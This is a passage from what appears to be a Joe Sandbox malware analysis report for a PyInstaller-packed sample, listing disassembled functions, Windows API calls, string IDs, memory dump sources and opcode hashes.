                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7B2B74F11,?,?,?,?,00007FF7B2B7A48A,?,?,?,?,00007FF7B2B7718F), ref: 00007FF7B2B7B33A
                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7B2B74F11,?,?,?,?,00007FF7B2B7A48A,?,?,?,?,00007FF7B2B7718F), ref: 00007FF7B2B7B34B
                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7B2B74F11,?,?,?,?,00007FF7B2B7A48A,?,?,?,?,00007FF7B2B7718F), ref: 00007FF7B2B7B35C
                                                                                                                                                                                                                                    • SetLastError.KERNEL32(?,?,?,00007FF7B2B74F11,?,?,?,?,00007FF7B2B7A48A,?,?,?,?,00007FF7B2B7718F), ref: 00007FF7B2B7B377
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Value$ErrorLast
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2506987500-0
                                                                                                                                                                                                                                    • Opcode ID: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
                                                                                                                                                                                                                                    • Instruction ID: e6df2da1ecce8215fbd49e5bd092bce7faf38a5f3bd62840856d7f34346eabbf
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 23119220A0E60281FA5A772D554013FD1425F667B0F958334DB2E467EEFEACA481C720
                                                                                                                                                                                                                                    Function 00007FF7B2B62910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7B2B61B6A), ref: 00007FF7B2B6295E
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                    • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                    • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                    • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                    • Instruction ID: 05bd1e00571816d784bd21264a45c0c88a40c8adfb83ae8ff0d975b697dc0cb8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B31F222A1A68152E612B729A8402E7F294BF997D4F800136EF8C8375DFEBCD546C610
                                                                                                                                                                                                                                    Function 00007FF7B2B62390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                    • String ID: Unhandled exception in script
                                                                                                                                                                                                                                    • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                    • Opcode ID: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
                                                                                                                                                                                                                                    • Instruction ID: 5ce0be122415a3249d21a9fb5c3ceed90bdfb40d65c488b464d9c97da4788e65
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2131626261A68184EB25FB29E8551FAA360FF99784F840135EB4D8BB5DEF7CD100C710
                                                                                                                                                                                                                                    Function 00007FF7B2B62B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF7B2B6918F,?,00007FF7B2B63C55), ref: 00007FF7B2B62BA0
                                                                                                                                                                                                                                    • MessageBoxW.USER32 ref: 00007FF7B2B62C2A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                    • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                    • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                    • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                    • Instruction ID: 9de56ca47da00e87fc75ee40be25587f8fa86a1a6711229040dbebca20a491f7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9121F622709B4141E712AB28F4457ABB360EB99780F800136EF8D9771EFE7CD605C710
                                                                                                                                                                                                                                    Function 00007FF7B2B62710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF7B2B61B99), ref: 00007FF7B2B62760
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                    • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                    • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                    • Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                    • Instruction ID: bb278804ec79bb59d0a82ba856561de66fc3e02e2fb07cdb9abc2aeaac0d7e7f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8321B132A1A78192E622AB28B8417E7F294FB99384F800135EF8C9365DFFBCD545C750
                                                                                                                                                                                                                                    Function 00007FF7B2B79A88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                    • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                    • Instruction ID: 2cf9eec0d28a3b01799bdef94bc928becf872a87f7c4ee6a2edd817592ddd47f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B0F0C821B0BB0681EA11AB2CE449777A320AF67760F940239C77E491FCEFACD044C320
                                                                                                                                                                                                                                    Function 00007FF7B2B89368 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _set_statfp
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1156100317-0
                                                                                                                                                                                                                                    • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                    • Instruction ID: 40825c11bb19e86264cf00e77f8fc6a26de56f152e4de1ce227f0087db0b184a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF115422E59E0241FE66315DE49937B9050AF77360E88863CE76E1F3DDAEFC5441C120
                                                                                                                                                                                                                                    Function 00007FF7B2B7B390 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FlsGetValue.KERNEL32(?,?,?,00007FF7B2B7A5A3,?,?,00000000,00007FF7B2B7A83E,?,?,?,?,?,00007FF7B2B7A7CA), ref: 00007FF7B2B7B3AF
                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7B2B7A5A3,?,?,00000000,00007FF7B2B7A83E,?,?,?,?,?,00007FF7B2B7A7CA), ref: 00007FF7B2B7B3CE
                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7B2B7A5A3,?,?,00000000,00007FF7B2B7A83E,?,?,?,?,?,00007FF7B2B7A7CA), ref: 00007FF7B2B7B3F6
                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7B2B7A5A3,?,?,00000000,00007FF7B2B7A83E,?,?,?,?,?,00007FF7B2B7A7CA), ref: 00007FF7B2B7B407
                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7B2B7A5A3,?,?,00000000,00007FF7B2B7A83E,?,?,?,?,?,00007FF7B2B7A7CA), ref: 00007FF7B2B7B418
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Value
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3702945584-0
                                                                                                                                                                                                                                    • Opcode ID: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
                                                                                                                                                                                                                                    • Instruction ID: 9c6c51e611f6a3f426660e9daab87d2896ac6e68b4e1a8cd5b178ddfbfaaa758
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A4116020E0A60241FA5AB76D554117BE1415F767B0FD88334EB3E467EEFDACA482CA20
                                                                                                                                                                                                                                    Function 00007FF7B2B7B224 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Value
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3702945584-0
                                                                                                                                                                                                                                    • Opcode ID: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
                                                                                                                                                                                                                                    • Instruction ID: 778f0eb86af786077209efcf2a2ff65232c0431565b55728862296bd923a87c5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C110620A0B20741FA9A766D445117B95424F77330F944734DB7E4A7EEFDACB481CA35
                                                                                                                                                                                                                                    Function 00007FF7B2B75FA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID: verbose
                                                                                                                                                                                                                                    • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                    • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                    • Instruction ID: 0231efa70123edd18c0b60cb1611a801a5fb5267b659450d51a19f3e75dc0637
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 89912722A0A64641E762BE2CC45037FB690AB6AB54FC44139DB5D437E9FEBCE445C320
                                                                                                                                                                                                                                    Function 00007FF7B2B7FBC8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                    • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                    • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                    • Instruction ID: 53240b9420ff13b66af61ac065102b251f3630c372ae266e36ad504baedde3ee
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1681A472D0A20285F766BE2D811027AB6A0EB33744FD54035CB0D972ADEFACE941D729
                                                                                                                                                                                                                                    Function 00007FF7B2B6D648 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                    • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                    • Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                    • Instruction ID: 63391447ebb32783e9b174e1a1429cf72136b83c373123a6474f1ef3a5cbeb26
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D51B032A1A6038ADB16AB19D004A3AF391FB65B88F904134DB4E8774CEFBCE841D714
                                                                                                                                                                                                                                    Function 00007FF7B2B6F288 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                    • String ID: csm$csm
                                                                                                                                                                                                                                    • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                    • Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
